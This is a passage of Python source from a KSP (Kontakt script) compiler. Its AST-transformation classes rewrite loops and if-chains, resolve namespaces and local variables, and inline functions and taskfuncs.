'pgs_create_str_key', 'pgs_str_key_exists', 'pgs_set_str_key_val', 'pgs_get_str_key_val']:
first_parameter_to_change = 1 # exclude the first parameter
else:
first_parameter_to_change = 0
node.function_name = self.modify(node.function_name, *args, **kwargs)
node.parameters[first_parameter_to_change:] = [self.modify(p, *args, **kwargs)
for p in node.parameters[first_parameter_to_change:]]
if node.is_procedure:
return [node]
else:
return node
class ASTModifierFixReferencesAndFamilies(ASTModifierBase):
def __init__(self, ast, line_map):
ASTModifierBase.__init__(self, modify_expressions=True)
self.line_map = line_map
self.traverse(ast, parent_function=None, function_params=[], parent_families=[])
def modifyModule(self, node, *args, **kwargs):
# find and extract 'on init' block
on_init_block = None
for b in node.blocks:
if isinstance(b, ksp_ast.Callback) and b.name == 'init':
node.blocks.remove(b)
on_init_block = b
break
# if there was none, create one
if on_init_block is None:
on_init_block = ksp_ast.Callback(node.lexinfo, 'init', lines=[])
node.on_init = on_init_block
# insert it as the first block
node.blocks.insert(0, on_init_block)
ASTModifierBase.modifyModule(self, node, *args, **kwargs)
        # in case some function definition has been overridden, keep only the version among functions.values()
node.blocks = [b for b in node.blocks if not (isinstance(b, ksp_ast.FunctionDef) and functions[b.name.identifier] != b)]
return node
def modifyForStmt(self, node, *args, **kwargs):
''' Convert for-loops into while-loops '''
if node.downto:
op = '>='
incdec = 'dec'
else:
op = '<='
incdec = 'inc'
# optimize "for x := 0 to N-1" into "while x < N" instead of the normal "while x <= N-1"
if not node.downto and isinstance(node.end, ksp_ast.BinOp) and node.end.op == '-' and isinstance(node.end.right, ksp_ast.Integer) and node.end.right.value == 1:
op = '<'
node.end = node.end.left # skip the -1 part (keep only the left operand)
loop_condition = ksp_ast.BinOp(node.lexinfo, node.loopvar.copy(), op, node.end)
# if a step is specified then the increment is formulated as x := x + step
if node.step:
incdec_op = {'inc': '+',
'dec': '-'}[incdec]
incdec_statement = ksp_ast.AssignStmt(node.lexinfo, node.loopvar.copy(), ksp_ast.BinOp(node.lexinfo, node.loopvar.copy(), incdec_op, node.step))
# otherwise we use inc(x) or dec(x)
else:
incdec_statement = ksp_ast.FunctionCall(node.lexinfo, ksp_ast.ID(node.lexinfo, incdec), [node.loopvar.copy()], is_procedure=True)
statements = [ksp_ast.AssignStmt(node.lexinfo, node.loopvar.copy(), node.start),
ksp_ast.WhileStmt(node.lexinfo, loop_condition,
node.statements + [incdec_statement])]
return flatten([self.modify(stmt, *args, **kwargs) for stmt in statements])
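    # e.g. "for $i := 0 to $n - 1 ... end for" becomes "$i := 0" followed by
    # "while ($i < $n) ... inc($i) ... end while" (the -1 case is optimized).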
def modifyIfStmt(self, node, *args, **kwargs):
''' Convert if-else if-else statements into just if-else statements by nesting them inside each other '''
# modify the if condition and the statements in the if-body
if_condition, stmts = node.condition_stmts_tuples[0]
if_condition, stmts = (self.modify(if_condition, *args, **kwargs),
flatten([self.modify(s, *args, **kwargs) for s in stmts]))
node.condition_stmts_tuples[0] = (if_condition, stmts)
# if if-else statement (i.e. no else-if part)
if len(node.condition_stmts_tuples) == 2 and node.condition_stmts_tuples[1][0] is None:
stmts = node.condition_stmts_tuples[1][1]
stmts = flatten([self.modify(s, *args, **kwargs) for s in stmts])
node.condition_stmts_tuples[1] = (None, stmts)
# else if there is any "else if" part
elif len(node.condition_stmts_tuples) > 1 and node.condition_stmts_tuples[1][0] is not None:
else_if_condition, else_if_stmts = node.condition_stmts_tuples[1]
            # create a new if-statement consisting of that 'else if' and all the following 'else if'/'else' clauses, and modify this recursively
new_if_stmt = self.modifyIfStmt(ksp_ast.IfStmt(node.condition_stmts_tuples[1][0].lexinfo, node.condition_stmts_tuples[1:]), *args, **kwargs)[0]
# the new contents of the else part will be the if-statement just created
node.condition_stmts_tuples = [node.condition_stmts_tuples[0],
(None, [new_if_stmt])]
return [node]
def modifyPropertyDef(self, node, *args, **kwargs):
# check syntax
for func_name in list(node.functiondefs.keys()):
if func_name not in ['get', 'set']:
raise ksp_ast.ParseException(node.functiondefs[func_name], "Expected function with name 'get' or 'set' but found '%s'" % func_name)
if not node.get_func_def and not node.set_func_def:
raise ksp_ast.ParseException(node, "Expected function with name 'get' or 'set' but found no function definition.")
if node.get_func_def and not node.get_func_def.return_value:
raise ksp_ast.ParseException(node.get_func_def, "The 'get' function needs to have a return value.")
if node.set_func_def and node.set_func_def.return_value:
raise ksp_ast.ParseException(node.set_func_def, "The 'set' function must not have a return value.")
if node.set_func_def and not node.set_func_def.parameters:
raise ksp_ast.ParseException(node.set_func_def, "The 'set' function must have at least one parameter.")
# prefix the name
if kwargs['parent_families']:
node.name = prefix_ID_with_ns(node.name, kwargs['parent_families'], kwargs['function_params'], force_prefixing=True)
else:
node.name = self.modifyID(node.name, kwargs['parent_function'], kwargs['parent_families'])
# change the get/set function names before proceeding to them
if node.get_func_def:
            node.get_func_def.name.identifier = node.name.identifier + '.get' # if the property is called prop, then this function is named prop.get
node.get_func_def = self.modify(node.get_func_def, parent_function=None, function_params=[], parent_families=[], add_name_prefix=False)
if node.set_func_def:
            node.set_func_def.name.identifier = node.name.identifier + '.set' # if the property is called prop, then this function is named prop.set
node.set_func_def = self.modify(node.set_func_def, parent_function=None, function_params=[], parent_families=[], add_name_prefix=False)
# add property to list
properties.add(node.name.identifier)
return []
def modifyFunctionDef(self, node, parent_function=None, function_params=None, parent_families=None, add_name_prefix=True):
        ''' Pass along some context information (eg. what function definition we're inside and what parameters it has)
Also initialize some member variables on the function object that will be modified inside its body (eg. local variable declarations) '''
node.local_declaration_statements = []
node.global_declaration_statements = []
node.taskfunc_declaration_statements = []
node.locals_name_subst_dict = {} # maps local variable names to their global counterpart
node.locals = set() # a set containing the keys in node.locals_name_subst_dict, but all in lower-case
node.used = False
# as we visit the function definition, pass along information to nodes further down the tree of the function parameter names
params = function_params + node.parameters
if node.return_value:
params.append(node.return_value.identifier)
# modify name first (add namespace prefix)
if add_name_prefix:
node.name = self.modify(node.name, parent_function=node, function_params=params, parent_families=parent_families)
# add function to table of available functions
if node.name.identifier in functions and not node.override:
            # if this function is overridden
if functions[node.name.identifier].override:
node.lines = [] # clear the lines so we don't accidentally introduce some performance cost by handling these later
else:
raise ksp_ast.ParseException(node, 'Function already declared')
else:
functions[node.name.identifier] = node
# modify the body of the function
node.lines = flatten([self.modify(l, parent_function=node, function_params=params, parent_families=parent_families) for l in node.lines])
return node
def modifyFamilyStmt(self, node, parent_function=None, function_params=None, parent_families=None):
''' First make sure the name of the family is prefixed with the right name space. Then pass this name as context to the further handling of the family body. '''
if parent_families is None:
parent_families = []
# only add namespaces to the outermost family name if multiple ones are nested
if not parent_families:
node.name = self.modify(node.name, parent_function=parent_function, function_params=function_params, parent_families=parent_families)
# add family name to the table of all used families
global_family_name = '.'.join(parent_families + [node.name.identifier])
families.add(global_family_name)
# then modify statements and pass along information to nodes further down the tree of the chain of family definitions so far
node.statements = flatten([self.modify(n, parent_function=parent_function,
function_params=function_params,
parent_families=parent_families + [str(node.name)]) for n in node.statements])
return [node.statements]
def add_global_var(self, global_varname, modifiers):
is_ui_declaration = any([m for m in modifiers if m.startswith('ui_')])
# add variable to list of variables
variables.add(global_varname.lower())
if is_ui_declaration:
ui_variables.add(global_varname.lower())
def handleLocalDeclaration(self, node, func):
''' Handle variable declaration made inside the function node given as parameter.
If the global modifier is not used, create a globally unique name for the local variable and add
info to the name substitution table (locals_name_subst_dict) of the function on how to translate
            occurrences of the local name to the globally unique one.
Add the globally unique version of the variable to the variables list and extract the declaration line
so that it can later be moved to the init callback '''
# result is by default empty since declaration line will be moved to 'on init'
result = []
# if a global variable declaration made inside a function
is_local = 'local' in node.modifiers
is_global = ('on_init' in func.name.identifier.lower() and not 'local' in node.modifiers) or ('global' in node.modifiers)
if is_global:
global_varname = node.variable.prefix + node.variable.identifier
self.add_global_var(global_varname, node.modifiers)
if 'global' in node.modifiers:
node.modifiers.remove('global')
# if local variable declaration
else:
# if there is an initial value, then add an assignment statement for this (eg. inside a function "declare x := 5" is replaced by "x := 5")
if node.initial_value and not 'const' in node.modifiers and not node.size:
var = node.variable.copy()
# copy also extra attribute added by this class, to make sure that we don't add namespace prefix a second time
if hasattr(node.variable, 'namespace_prefix_done'):
var.namespace_prefix_done = node.variable.namespace_prefix_done
result.append(ksp_ast.AssignStmt(node.lexinfo, ksp_ast.VarRef(node.lexinfo, var), node.initial_value))
# check that the local variable name has not previously been used and add it to the list of locals
local_varname = node.variable.identifier
if local_varname.lower() in func.locals:
raise ksp_ast.ParseException(node.variable, "Local variable redeclared: %s" % local_varname)
func.locals.add(local_varname.lower())
            # add info about how to map the local name to the global name so that occurrences of the local name can later be modified
if func.is_taskfunc and not 'local' in node.modifiers:
                # eg. map x to %p[$fp + 1], where 1 is used for the first local declaration, 2 for the second and so on
var_index = len(func.taskfunc_declaration_statements) + 1
li = node.variable.lexinfo
func.locals_name_subst_dict[local_varname] = ksp_ast.VarRef(node.lexinfo, ksp_ast.ID(node.lexinfo, '%p'),
[ksp_ast.BinOp(li, ksp_ast.VarRef(li, ksp_ast.ID(li, '$fp')), '+', ksp_ast.Integer(li, var_index))])
else:
# eg. map x to $_x
# change name of variable to be a combination of the function name and the declared name (and make sure it's unique)
global_varname = '%s_%s' % (node.variable.prefix, local_varname)
i = 2
while global_varname.lower() in variables:
global_varname = '%s_%s%d' % (node.variable.prefix, local_varname, i)
i += 1
func.locals_name_subst_dict[local_varname] = ksp_ast.VarRef(node.lexinfo, ksp_ast.ID(node.lexinfo, global_varname))
node.variable.prefix, node.variable.identifier = global_varname[0], global_varname[1:]
if 'local' in node.modifiers:
node.modifiers.remove('local')
self.add_global_var(global_varname, node.modifiers)
if is_global:
func.global_declaration_statements.append(node)
elif func.is_taskfunc and not is_local:
func.taskfunc_declaration_statements.append(node)
else:
func.local_declaration_statements.append(node)
return result
def modifyDeclareStmt(self, node, *args, **kwargs):
''' Add a variable prefix ($ or %) to the declaration if not already given.
If declared inside a family then prefix it with the names of the family definitions we're currently inside.
            Otherwise prefix the name with the namespaces of the line it's declared on (when that line was imported using "import ... as").
Handle the case when the variable is declared inside a user-defined function. '''
# default handling of everything except the variable name:
node.size = self.modify(node.size, *args, **kwargs)
if type(node.initial_value) is list:
node.initial_value = [self.modify(v, *args, **kwargs) for v in node.initial_value]
elif node.initial_value:
node.initial_value = self.modify(node.initial_value, *args, **kwargs)
node.parameters = [self.modify(p, *args, **kwargs) for p in node.parameters]
# if variable was declared inside a family, prefix it with the namespaces given by the chain of nested families it's declared inside
if kwargs['parent_families']:
node.variable = prefix_ID_with_ns(node.variable, kwargs['parent_families'], kwargs['function_params'], force_prefixing=True)
# otherwise treat it as any other name
else:
node.variable = self.modifyID(node.variable, kwargs['parent_function'], kwargs['parent_families'], is_name_in_declaration=True)
# if no variable prefix used, add one automatically
if not node.variable.prefix:
if node.size is not None:
node.variable.prefix = '%'
else:
node.variable.prefix = '$'
# is this declaration made inside of a function?
if kwargs['parent_function']:
lines = self.handleLocalDeclaration(node, kwargs['parent_function'])
lines = flatten([self.modify(n, *args, **kwargs) for n in lines])
return lines
else:
vname = node.variable.prefix + node.variable.identifier.lower()
self.add_global_var(vname, node.modifiers)
return [node]
def modifyVarRef(self, node, parent_function=None, function_params=None, parent_families=None, is_name_in_declaration=False):
''' Translate any references to local variables to their real name '''
# Note 1: previously this could all be handled in modifyID, but since the taskfunc system introduced VarRef objects with subscripts
# we now need to handle it here since if you replace eg. x by %p[$sp + 1] the subscript need to be included in the resulting node.
# Note 2: not all identifiers have a parent VarRef so some replacements are also taken care of in the modifyID routine (see below).
if parent_function and node.identifier.identifier in parent_function.locals_name_subst_dict:
new_node = parent_function.locals_name_subst_dict[node.identifier.identifier]
if node.subscripts and isinstance(new_node, ksp_ast.VarRef): # combine subscripts
subscripts = [self.modify(s, parent_function, function_params, parent_families, is_name_in_declaration)
for s in node.subscripts + new_node.subscripts]
new_node = ksp_ast.VarRef(new_node.lexinfo, new_node.identifier, subscripts)
return new_node
return super(ASTModifierFixReferencesAndFamilies, self).modifyVarRef(node, parent_function, function_params, parent_families, is_name_in_declaration)
def modifyID(self, node, parent_function=None, function_params=None, parent_families=None, is_name_in_declaration=False):
''' Add namespace prefix and translate references to local variables to their globally unique counterpart as determined by the translation table of the function '''
# look up the line object from the first macro preprocessor phase in order to extract information about the namespace
namespaces = self.line_map[node.lineno].namespaces
# make sure to not add namespace twice
if hasattr(node, 'namespace_prefix_done'):
#raise ksp_ast.ParseException(node, 'this one already has a namespace: ' + unicode(node))
id = node
else:
id = prefix_ID_with_ns(node, namespaces, function_params, force_prefixing=is_name_in_declaration)
# if this is a local variable name, then replace it with the corresponding global name
# most of these are handled by modifyVarRef, but here we catch some other cases like for example declaration statements (where the identifier isn't a varref)
if parent_function and id.identifier in parent_function.locals_name_subst_dict:
id = parent_function.locals_name_subst_dict[id.identifier].identifier
#id = ksp_ast.ID(node.lexinfo, parent_function.locals_name_subst_dict[id.identifier])
        # mark node so that we don't add the namespace prefix twice
id.namespace_prefix_done = True
return id
class ASTModifierFixPrefixes(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=True)
self.traverse(ast)
def modifyFunctionDef(self, node, parent_function=None, parent_varref=None):
return ASTModifierBase.modifyFunctionDef(self, node, parent_function=node) # pass along a reference to what function we're currently inside
def modifyVarRef(self, node, parent_function=None, parent_varref=None):
return ASTModifierBase.modifyVarRef(self, node, parent_function=parent_function, parent_varref=node) # pass along a reference to what varref we're currently inside
def modifyID(self, node, parent_function=None, parent_varref=None):
''' Add a variable prefix (one of $, %, @, !, ? and ~) to each variable based on the list of variables previously built '''
name = node.prefix + node.identifier
first_part = name.split('.')[0]
# if prefix is missing and this is not a function or family and does not start with a function parameter (eg. if a parameter is passed as param and then referenced as param__member)
if node.prefix == '' and not (name in functions or
name in ksp_builtins.functions or
name in families or
name in properties or
(parent_function and (first_part in parent_function.parameters or
parent_function.return_value and first_part == parent_function.return_value.identifier))):
possible_prefixes = [prefix for prefix in '$%@!?~'
if prefix + name.lower() in variables or prefix + name in ksp_builtins.variables]
# if there is a subscript then only array types are possible
if parent_varref and parent_varref.subscripts:
possible_prefixes = [p for p in possible_prefixes if p not in '$@~']
if len(possible_prefixes) == 0:
raise ksp_ast.ParseException(node, "%s has not been declared!" % name)
if len(possible_prefixes) > 1:
raise ksp_ast.ParseException(node, "Type of %s ambigious (variable prefix could be any of: %s)" % (name, ', '.join(possible_prefixes)))
node.prefix = possible_prefixes[0]
return node
elif node.prefix and not (name.lower() in variables or name in ksp_builtins.variables):
raise ksp_ast.ParseException(node, "%s has not been declared." % name)
else:
return node
class ASTModifierFixPrefixesIncludingLocalVars(ASTModifierFixPrefixes):
def __init__(self, ast):
ASTModifierFixPrefixes.__init__(self, ast)
def modifyFunctionDef(self, node, parent_function=None):
# pass along a reference to what function we're currently inside
node = ASTModifierBase.modifyFunctionDef(self, node, parent_function=node)
# extracted local/global variable declarations won't be handled automatically, so modify them explicitly here
node.local_declaration_statements = flatten([self.modify(n, parent_function=node) for n in node.local_declaration_statements])
node.global_declaration_statements = flatten([self.modify(n, parent_function=node) for n in node.global_declaration_statements])
# TODO: check if we need to handle this one too:
#node.taskfunc_declaration_statements = flatten([self.modify(n, parent_function=node) for n in node.taskfunc_declaration_statements])
return node
class ASTModifierIDSubstituter(ASTModifierBase):
'''Class for replacing whole names with new names, eg. replace all "$x" by "$y" and all "$loop_counter" by "$plsd" (in case variable names are compacted).
If there is an "x" to "y" substitution and it sees the name x.z, then it will NOT be translated into y.z. Only whole names are changed.
'''
def __init__(self, name_subst_dict, force_lower_case=False):
self.name_subst_dict = name_subst_dict
self.force_lower_case = force_lower_case
ASTModifierBase.__init__(self, modify_expressions=True)
def modifyID(self, node, *args, **kwargs):
''' Translate identifiers according to the translation table '''
lookup_key = node.prefix + node.identifier
if self.force_lower_case:
lookup_key = lookup_key.lower()
if lookup_key in self.name_subst_dict:
new_identifier = self.name_subst_dict[lookup_key]
if isinstance(new_identifier, str):
return ksp_ast.ID(node.lexinfo, new_identifier)
else:
raise ksp_ast.ParseException(node, "Internal error when replacing variables. Expected a string to replace with.")
else:
return node
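# Minimal usage sketch (assuming `module` is an already parsed ksp_ast.Module):
#   ASTModifierIDSubstituter({'$loop_counter': '$lc'}, force_lower_case=True).modify(module)
# Only whole names are replaced, so an identifier like "$loop_counter.member" keeps its name.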
class ASTModifierVarRefSubstituter(ASTModifierBase):
'''Class for replacing certain variables references with an expression, eg. replace all "param" by "$y+1".
If there is an "x" to "y" substitution and it sees the name x.z, then this will (unlike if ASTModifierIDSubstituter had been used) be translated into y.z.
'''
def __init__(self, name_subst_dict, inlining_function_node=None, subscript_addition=False):
self.name_subst_dict = name_subst_dict
self.inlining_function_node = inlining_function_node
self.subscript_addition = subscript_addition
ASTModifierBase.__init__(self, modify_expressions=True)
def modify(self, node, *args, **kwargs):
''' if a reference to a parent function that is being inlined should be added, then add it to the result (each statement of the result in case it's a list) '''
result = ASTModifierBase.modify(self, node, *args, **kwargs)
if not (self.inlining_function_node is None):
if result is None:
pass
elif type(result) is list:
for stmt in result:
stmt.lexinfo[2].append(self.inlining_function_node)
else:
result.lexinfo[2].append(self.inlining_function_node)
return result
def modifyVarRef(self, node, *args, **kwargs):
if node.identifier.identifier_first_part in self.name_subst_dict:
new_expr = self.name_subst_dict[node.identifier.identifier_first_part]
if isinstance(new_expr, ksp_ast.VarRef):
if self.subscript_addition:
# figure out which subscript to use or add if there are two
if not new_expr.subscripts and not node.subscripts:
subscripts = []
elif len(new_expr.subscripts) == 1 and not node.subscripts:
subscripts = [self.modify(s, *args, **kwargs) for s in new_expr.subscripts]
elif not new_expr.subscripts and len(node.subscripts) == 1:
subscripts = [self.modify(s, *args, **kwargs) for s in node.subscripts]
elif len(new_expr.subscripts) == 1 and len(node.subscripts) == 1:
subscripts = [ksp_ast.BinOp(node.lexinfo, new_expr.subscripts[0], '+', node.subscripts[0])]
#else:
# raise ksp_ast.ParseException(node, 'Double subscript not allowed: %s' % unicode(node))
else:
subscripts = [self.modify(s, *args, **kwargs) for s in node.subscripts] + new_expr.subscripts
# build a new VarRef where the first part of the identifier has been replaced by the new_expr name.
return ksp_ast.VarRef(new_expr.lexinfo,
ksp_ast.ID(new_expr.identifier.lexinfo, new_expr.identifier.prefix + new_expr.identifier.identifier + node.identifier.identifier_last_part),
subscripts=subscripts)
else:
return new_expr
else:
return ASTModifierBase.modifyVarRef(self, node, *args, **kwargs)
def modifyFunctionDef(self, node, *args, **kwargs):
# don't modify the function name ID (replacing it with an expression is not the right thing to do...)
# modify everything else (the lines in the body)
node.lines = flatten([self.modify(l, *args, **kwargs) for l in node.lines])
return node
def modifyFunctionCall(self, node, *args, **kwargs):
''' Check if the function name in a function call is a parameter and substitute its name if that's the case '''
func_call = node
if node.function_name.identifier_first_part in self.name_subst_dict:
# fetch the replacement expression and ensure that it's a variable reference
new_expr = self.name_subst_dict[node.function_name.identifier_first_part]
if not isinstance(new_expr, ksp_ast.VarRef):
raise ksp_ast.ParseException(node, 'Expected a function name parameter')
# create a new FunctionCall object with the substituted function name
function_name = ksp_ast.ID(new_expr.identifier.lexinfo, new_expr.identifier.identifier + node.function_name.identifier_last_part)
func_call = ksp_ast.FunctionCall(new_expr.lexinfo, function_name, node.parameters, node.is_procedure, node.using_call_keyword)
return ASTModifierBase.modifyFunctionCall(self, func_call, *args, **kwargs)
def modifyID(self, node, *args, **kwargs):
''' Translate identifiers according to the translation table (used for inlining functions, see ASTModifierFunctionExpander) '''
if node.identifier_first_part in self.name_subst_dict:
raise Exception('here although we expected not to be, ID=%s, %s' % (node.identifier, self.name_subst_dict))
new_expr = self.name_subst_dict[node.identifier]
if type(new_expr) in (str, str):
new_expr = ksp_ast.ID(node.lexinfo, new_expr)
else:
raise Exception('error')
return new_expr
else:
return node
class ASTModifierNameFixer(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=True)
self.traverse(ast)
def replace_dots_in_name(self, name):
''' Replaces . by __ in name'''
return name.replace('.', '__')
def modifyID(self, node, *args, **kwargs):
orig = node.identifier
x = self.replace_dots_in_name(node.identifier)
if '.' in node.identifier:
node.identifier = node.identifier.replace('.', '__')
return node
class ASTModifierFunctionExpander(ASTModifierBase):
def __init__(self, ast):
ASTModifierBase.__init__(self, modify_expressions=True)
self.traverse(ast, parent_toplevel=None, function_stack=[])
def modifyModule(self, node, *args, **kwargs):
''' Add init callback if it is not already available and move it to the top (before all other functions and callbacks) '''
# find and extract 'on init' block
on_init_block = None
for b in node.blocks:
if isinstance(b, ksp_ast.Callback) and b.name == 'init':
node.blocks.remove(b)
on_init_block = b
break
# if there was none, create one
if on_init_block is None:
on_init_block = ksp_ast.Callback(node.lexinfo, 'init', lines=[])
# insert it as the first block
node.blocks.insert(0, on_init_block)
return ASTModifierBase.modifyModule(self, node, *args, **kwargs)
def modifyFunctionDef(self, node, parent_toplevel=None, function_stack=None):
''' Add to context info about which function/callback we are currently inside '''
# only functions without parameters/return value can be invoked using 'call'
# those are the only ones where we need to modify the original function definition
# (in the other cases the recursive inlining handles everything)
if (node.parameters or node.return_value) and not node.is_taskfunc:
return node
else:
return ASTModifierBase.modifyFunctionDef(self, node, parent_toplevel=node, function_stack=function_stack)
def modifyCallback(self, node, parent_toplevel=None, function_stack=None):
''' Add to context info about which function/callback we are currently inside '''
return ASTModifierBase.modifyCallback(self, node, parent_toplevel=node, function_stack=function_stack)
def convert_property_access_to_function_call(self, node):
''' Convert a property reference like myprop to a function call like myprop.get() '''
assert(isinstance(node, ksp_ast.VarRef))
func_name = '%s.get' % node.identifier.identifier
if func_name not in functions:
raise ksp_ast.ParseException(node, 'The property %s has no get-function and can therefore not be written to.' % str(node.identifier.identifier))
get_function = functions[func_name]
# if there is a subscript, pass it as a parameter to the get function
parameters = node.subscripts[:]
return ksp_ast.FunctionCall(node.lexinfo, get_function.name, parameters, is_procedure=False)
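# e.g. a read of  myprop[3]  is rewritten as a call to the property's get-function,
# roughly  myprop.get(3)  -- any subscripts become the arguments of that call.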
def modifyVarRef(self, node, *args, **kwargs):
''' If the varref is a property, then convert it to a call to the get-function of the property '''
if node.identifier.identifier in properties:
return self.modifyFunctionCall(self.convert_property_access_to_function_call(node),
*args, **kwargs)
else:
return ASTModifierBase.modifyVarRef(self, node, *args, **kwargs)
def modifyAssignStmt(self, node, parent_toplevel=None, function_stack=None, disallow_function_in_rhs=False):
''' If it's an assignment of the type "x := myfunc(...)" then pass the left hand side of the assignment ("x" in this case)
as a parameter to the function call handler. This effectively passes the lhs as a parameter to the function and replaces
the whole assignment by the inlined function body. This allows myfunc to be a multi-line function.
Please note that this only applies if the function call is the only thing on the right hand side.
In the case of for example "x := myfunc(...) + 1" the inlining of the function is handled in the context of
an expression handler and in that context only functions whose body consists of a single assignment are allowed (the right
hand side expression of that assignment is then what gets inlined into the expression. '''
if not isinstance(node.varref, ksp_ast.VarRef):
raise ksp_ast.ParseException(node, 'The left hand side of the assignment needs to be a variable reference.')
# if this is a property assignment, eg. myproperty := 5, convert it to a function call, eg. myproperty.set(5)
if node.varref.identifier.identifier in properties:
func_name = '%s.set' % node.varref.identifier.identifier
if func_name not in functions:
raise ksp_ast.ParseException(node.varref, 'The property %s has no set-function and is therefore read-only.' % str(node.varref.identifier.identifier))
set_function = functions[func_name]
parameters = node.varref.subscripts + [node.expression]
function_call = ksp_ast.FunctionCall(node.lexinfo, set_function.name, parameters, is_procedure=True)
return self.modifyFunctionCall(function_call,
parent_toplevel=parent_toplevel,
function_stack=function_stack)
expression = node.expression
# if the right-hand-side is a property access, convert it to a function call to the get-function of the property
if isinstance(expression, ksp_ast.VarRef) and expression.identifier.identifier in properties:
expression = self.convert_property_access_to_function_call(node.expression)
# if the right-hand-side is function call
if isinstance(expression, ksp_ast.FunctionCall) and expression.function_name.identifier not in ksp_builtins.functions and not disallow_function_in_rhs:
# invocations of built-in functions are not checked at this compilation stage
return self.modifyFunctionCall(expression,
parent_toplevel=parent_toplevel,
function_stack=function_stack,
assign_stmt_lhs=node.varref)
else:
return ASTModifierBase.modifyAssignStmt(self, node, parent_toplevel=parent_toplevel, function_stack=function_stack)
def doFunctionCallChecks(self, node, function_name, func, is_inside_init_callback, function_stack, assign_stmt_lhs):
''' Make various checks that a function call is correct (eg. function exists, parameters match, not recursive, invoked from a valid context).
Factored out from the modifyFunctionCall method in order to make the logic there easier to follow '''
# verify that function exists
if func is None:
raise ksp_ast.ParseException(node, "Unknown function: %s" % function_name)
# verify that it's not a recursive call
if function_name in function_stack:
raise ksp_ast.ParseException(node, "Recursive functions calls (functions directly or indirectly calling themselves) not allowed: %s" % ' -> '.join(function_stack + [function_name]))
# verify that number of parameters and arguments matches
if len(node.parameters) != len(func.parameters):
raise ksp_ast.ParseException(node, "Wrong number of parameters to %s. Expected %d, got %d." % (function_name, len(func.parameters), len(node.parameters)))
# verify that function calls that are part of expressions invoke a function for which a return value variable has been defined
if not node.is_procedure and func.return_value is None:
raise ksp_ast.ParseException(node, "Function %s does not return any value and cannot be used in this context" % function_name)
# verify that function is not used within some expression, unless it's a taskfunc function and it's the single thing on the right-hand side of an assignment
if not node.is_procedure and func.is_taskfunc and assign_stmt_lhs is None:
raise ksp_ast.ParseException(node, 'When used inside an expression like this the function call needs to be the only thing on the right hand side of an assignment, eg. x := call myfunc().')
# verify that 'call' is not used from within 'on init'
if is_inside_init_callback and (node.using_call_keyword or func.is_taskfunc):
raise ksp_ast.ParseException(node, 'Usage of "call" inside init callback is not allowed (please also verify that the function is not a taskfunc).')
if node.using_call_keyword:
# verify that there are no parameters (unless it's a taskfunc function call)
if not func.is_taskfunc and node.parameters:
raise ksp_ast.ParseException(node, "Parameters for function invokations using 'call' not supported by Kontakt")
# verify that 'call' is not used within some expression (eg. as in the incorrect "x := call myfunc")
if not node.is_procedure and not func.is_taskfunc:
raise ksp_ast.ParseException(node, 'Using "call" inside an expression is not allowed for non-taskfunc functions. "call" needs to be the first word of the line.')
if func.is_taskfunc:
raise ksp_ast.ParseException(node, 'A taskfunc function cannot be invoked using the "call" keyword')
def updateCallGraph(self, node, parent_toplevel=None, function_stack=None):
''' This function takes a function call as parameter node and updates the call graph accordingly '''
if isinstance(parent_toplevel, ksp_ast.FunctionDef):
parent_function_name = parent_toplevel.name.identifier
else:
parent_function_name = None # if called from within a callback represent the callback as None in the call graph (since it's not really relevant from which callback)
function_name = node.function_name.identifier
if function_name not in ksp_builtins.functions: # and not (isinstance(parent_toplevel, ksp_ast.FunctionCall) and function_name in parent_toplevel.locals_name_subst_dict):
if function_name not in functions:
raise ksp_ast.ParseException(node.function_name, "Unknown function: %s" % function_name)
call_graph[parent_function_name].append(function_name) # enter a link from the caller to the callee in the call graph
call_graph[function_name] = call_graph[function_name] # add target node if it doesn't already exist
if node.using_call_keyword:
called_functions.add(function_name)
def getTaskFuncCallPrologueAndEpilogue(self, node, func, assign_stmt_lhs):
# if the function call is of the format "x := myfunc(...)" then treat it like myfunc(..., x), i.e. insert the left hand side of the assignment as the last parameter
if assign_stmt_lhs:
parameters = node.parameters + [assign_stmt_lhs]
else:
parameters = node.parameters
prologue = []
epilogue = []
for i, param in enumerate(parameters):
idx = len(parameters)-i
if func.parameter_types[i] not in ('out', 'ref'):
li = param.lexinfo
p_ref = ksp_ast.VarRef(li, ksp_ast.ID(li, '%p'),
[ksp_ast.BinOp(li, ksp_ast.VarRef(li, ksp_ast.ID(li, '$sp')), '-', ksp_ast.Integer(li, idx))])
prologue.append(ksp_ast.AssignStmt(li, p_ref, param))
if isinstance(param, ksp_ast.VarRef) and func.parameter_types[i] in ('out', 'var'):
li = param.lexinfo
p_ref = ksp_ast.VarRef(li, ksp_ast.ID(li, '%p'),
[ksp_ast.BinOp(li, ksp_ast.VarRef(li, ksp_ast.ID(li, '$sp')), '-', ksp_ast.Integer(li, idx))])
epilogue.append(ksp_ast.AssignStmt(li, param, p_ref))
return (prologue, epilogue)
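# Rough illustration of the generated stack handling (inferred from the loop above; the
# taskfunc signature and names are made up): for "taskfunc mytask(a, out b)" invoked as
# "mytask(x, y)" the prologue becomes  %p[$sp - 2] := x  (pass-by-value parameter) and the
# epilogue becomes  y := %p[$sp - 1]  (copy the 'out' parameter back). For "r := mytask(x)"
# the left-hand side r is appended as an extra trailing parameter before this loop runs.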
def modifyFunctionCall(self, node, parent_toplevel=None, function_stack=None, assign_stmt_lhs=None):
''' For invocations of user-defined functions, check that the function is defined and that the number of parameters matches.
Unless "call" is used, inline the function. '''
function_name = node.function_name.identifier # shorter name alias
# update call graph
self.updateCallGraph(node, parent_toplevel, function_stack)
# invocations of built-in functions are not checked at this compilation stage
if function_name in ksp_builtins.functions and not node.using_call_keyword:
if function_name == 'wait' and isinstance(parent_toplevel, ksp_ast.FunctionDef):
functions_invoking_wait.add(parent_toplevel.name.identifier)
return ASTModifierBase.modifyFunctionCall(self, node, parent_toplevel=parent_toplevel, function_stack=function_stack, assign_stmt_lhs=assign_stmt_lhs)
# get a reference to the function node and run error checks
func = functions.get(function_name, None)
is_inside_init_callback = isinstance(parent_toplevel, ksp_ast.Callback) and parent_toplevel.name == 'init'
self.doFunctionCallChecks(node, function_name, func, is_inside_init_callback, function_stack, assign_stmt_lhs)
# if function invoked from within a callback, mark it as used
if isinstance(parent_toplevel, ksp_ast.Callback):
functions[function_name].used = True
# if it's a call to a taskfunc function
if func.is_taskfunc:
(prologue, epilogue) = self.getTaskFuncCallPrologueAndEpilogue(node, func, assign_stmt_lhs)
prologue = flatten([self.modifyAssignStmt(stmt, parent_toplevel, function_stack, disallow_function_in_rhs=True) for stmt in prologue])
